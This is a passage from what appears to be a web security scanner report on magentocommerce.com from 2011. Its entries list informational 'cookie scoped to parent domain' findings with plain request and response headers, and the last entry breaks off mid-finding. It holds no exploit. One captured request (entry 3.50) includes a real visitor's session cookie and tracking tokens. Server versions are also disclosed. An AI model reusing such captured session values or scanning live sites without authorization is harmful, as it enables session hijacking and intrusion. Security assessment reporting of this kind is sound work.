Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176308; expires=Sat, 11-Aug-2012 15:11:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fdownload%2Frelease_notes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:49 GMT
Content-Length: 282941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.43. http://www.magentocommerce.com/es

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /es

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176528; expires=Sat, 11-Aug-2012 15:15:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fes%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:28 GMT
Content-Length: 69388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.44. http://www.magentocommerce.com/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /fr

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.45. http://www.magentocommerce.com/he

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.46. http://www.magentocommerce.com/hu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.47. http://www.magentocommerce.com/imagine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.48. http://www.magentocommerce.com/it

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.49. http://www.magentocommerce.com/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.50. http://www.magentocommerce.com/jobs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.51. http://www.magentocommerce.com/jobs/p/2/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.52. http://www.magentocommerce.com/knowledge-base

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.53. http://www.magentocommerce.com/license/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.54. http://www.magentocommerce.com/license/enterprise-edition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.55. http://www.magentocommerce.com/lodger-footwear/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.56. http://www.magentocommerce.com/lt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.57. http://www.magentocommerce.com/magento-connect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.58. http://www.magentocommerce.com/maps/online

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

